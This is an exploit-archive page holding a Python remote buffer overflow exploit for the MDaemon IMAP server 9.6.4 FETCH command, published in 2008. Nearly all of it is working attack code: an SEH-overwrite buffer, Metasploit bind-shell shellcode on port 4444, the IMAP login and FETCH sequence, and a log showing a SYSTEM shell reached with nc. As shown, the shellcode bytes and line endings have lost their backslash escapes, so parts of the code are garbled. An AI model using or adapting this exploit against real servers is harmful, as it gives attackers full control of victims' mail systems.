[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MDaemon IMAP server 9.6.4 (FETCH) Remote Buffer Overflow Exploit
# Published : 2008-03-13
# Author : Matteo Memelli
# Previous Title : Motorola Timbuktu Pro <= 8.6.5 File Deletion/Creation Exploit
# Next Title : Black Ice Software Inc Barcode SDK (BITiff.ocx) Remote BOF Exploit
#!/usr/bin/python
###############################################################################
#
# MDAEMON (POST AUTH) REMOTE R00T IMAP FETCH COMMAND UNIVERSAL EXPLOIT 0day
# Bug discovered and coded by Matteo Memelli aka ryujin
# http://www.gray-world.net http://www.be4mind.com
#
# Affected Versions : MDaemon IMAP server v9.6.4
# Tested on OS : Windows 2000 SP4 English
# Windows XP Sp2 English
# Windows 2003 Standard Edition Italian
# Discovery Date : 03/13/2008
#
#-----------------------------------------------------------------------------
#
# muts AS YOU CAN SEE, I ALWAYS MAINTAIN MY PROMISES! LOL
#
# Thx to Silvia for feeding my obsessions
# Thx to didNot at #offsec
# (yes he doesn't look like Silvia but he's a nice guy LOL)
# and to www.offensive-security.com
#
#-----------------------------------------------------------------------------
##############################################################################
# [+] Connecting to imap server...
# * OK test.local IMAP4rev1 MDaemon 9.6.4 ready
#
# [+] Logging in...
# 0001 OK LOGIN completed
#
# [+] Selecting Inbox Folder...
# * FLAGS (Seen Answered Flagged Deleted Draft Recent)
# * 16 EXISTS
# * 16 RECENT
# * OK [UNSEEN 1] first unseen
# * OK [UIDVALIDITY 1205411202] UIDs valid
# * OK [UIDNEXT 17] Predicted next UID
# * OK [PERMANENTFLAGS (Seen Answered Flagged Deleted Draft)] .
# 0002 OK [READ-WRITE] SELECT completed
#
# [+] We need at least one message in Inbox, appending one...
# + Ready for append literal
#
# [+] What would you like for dinner? SPAGHETTI AND PWNSAUCE?
# * 17 EXISTS
# * 17 RECENT
# 0003 OK [APPENDUID 1205411202 17] APPEND completed
#
# [+] DINNER'S READY: Sending Evil Buffer...
# [+] DONE! Check your shell on 192.168.1.195:4444
#
#
# matte@badrobot:~$ nc 192.168.1.195 4444
# (UNKNOWN) [192.168.1.195] 4444 (?) : Connection refused
# matte@badrobot:~$ nc 192.168.1.195 4444
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:MDaemonAPP>whoami
# whoami
# NT AUTHORITYSYSTEM
#
# C:MDaemonAPP>
##############################################################################
from socket import *
from optparse import OptionParser
import sys, time
print "[*********************************************************************]"
print "[* *]"
print "[* MDAEMON (POST AUTH) REMOTE R00T IMAP FETCH COMMAND EXPLOIT *]"
print "[* DISCOVERED AND CODED *]"
print "[* by *]"
print "[* MATTEO MEMELLI *]"
print "[* (ryujin) *]"
print "[* www.be4mind.com - www.gray-world.net *]"
print "[* *]"
print "[*********************************************************************]"
usage = "%prog -H TARGET_HOST -P TARGET_PORT -l USER -p PASSWD"
parser = OptionParser(usage=usage)
parser.add_option("-H", "--target_host", type="string",
action="store", dest="HOST",
help="Target Host")
parser.add_option("-P", "--target_port", type="int",
action="store", dest="PORT",
help="Target Port")
parser.add_option("-l", "--login-user", type="string",
action="store", dest="USER",
help="User login")
parser.add_option("-p", "--login-password", type="string",
action="store", dest="PASSWD",
help="User password")
(options, args) = parser.parse_args()
HOST = options.HOST
PORT = options.PORT
USER = options.USER
PASSWD = options.PASSWD
if not (HOST and PORT and USER and PASSWD):
parser.print_help()
sys.exit()
# windows/shell_bind_tcp - 317 bytes
# http://www.metasploit.com
# EXITFUNC=thread, LPORT=4444
shellcode = (
"xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8b"
"x45x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01"
"xebx49x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07"
"xc1xcax0dx01xc2xebxf4x3bx54x24x28x75xe5x8bx5f"
"x24x01xebx66x8bx0cx4bx8bx5fx1cx01xebx03x2cx8b"
"x89x6cx24x1cx61xc3x31xdbx64x8bx43x30x8bx40x0c"
"x8bx70x1cxadx8bx40x08x5ex68x8ex4ex0execx50xff"
"xd6x66x53x66x68x33x32x68x77x73x32x5fx54xffxd0"
"x68xcbxedxfcx3bx50xffxd6x5fx89xe5x66x81xedx08"
"x02x55x6ax02xffxd0x68xd9x09xf5xadx57xffxd6x53"
"x53x53x53x53x43x53x43x53xffxd0x66x68x11x5cx66"
"x53x89xe1x95x68xa4x1ax70xc7x57xffxd6x6ax10x51"
"x55xffxd0x68xa4xadx2exe9x57xffxd6x53x55xffxd0"
"x68xe5x49x86x49x57xffxd6x50x54x54x55xffxd0x93"
"x68xe7x79xc6x79x57xffxd6x55xffxd0x66x6ax64x66"
"x68x63x6dx89xe5x6ax50x59x29xccx89xe7x6ax44x89"
"xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93x8dx7ax38"
"xabxabxabx68x72xfexb3x16xffx75x44xffxd6x5bx57"
"x52x51x51x51x6ax01x51x51x55x51xffxd0x68xadxd9"
"x05xcex53xffxd6x6axffxffx37xffxd0x8bx57xfcx83"
"xc4x64xffxd6x52xffxd0x68xefxcexe0x60x53xffxd6"
"xffxd0"
)
s = socket(AF_INET, SOCK_STREAM)
print " [+] Connecting to imap server..."
s.connect((HOST, PORT))
print s.recv(1024)
print " [+] Logging in..."
s.send("0001 LOGIN %s %srn" % (USER, PASSWD))
print s.recv(1024)
print " [+] Selecting Inbox Folder..."
s.send("0002 SELECT Inboxrn")
print s.recv(1024)
print " [+] We need at least one message in Inbox, appending one..."
s.send('0003 APPEND Inbox {1}rn')
print s.recv(1024)
print " [+] What would you like for dinner? SPAGHETTI AND PWNSAUCE?"
s.send('SPAGHETTI AND PWNSAUCErn')
print s.recv(1024)
print " [+] DINNER'S READY: Sending Evil Buffer..."
# Seh overwrite at 532 Bytes
# pop edi; pop ebp; ret; From mdaemon/HashCash.dll
EVIL = "A"*528 + "xEBx06x90x90" + "x8bx11xdcx64" + "x90"*8 + shellcode + 'C'*35
s.send("A654 FETCH 2:4 (FLAGS BODY[" + EVIL + " (DATE FROM)])rn")
s.close()
print " [+] DONE! Check your shell on %s:%d" % (HOST, 4444)
# www.Syue.com [2008-03-13]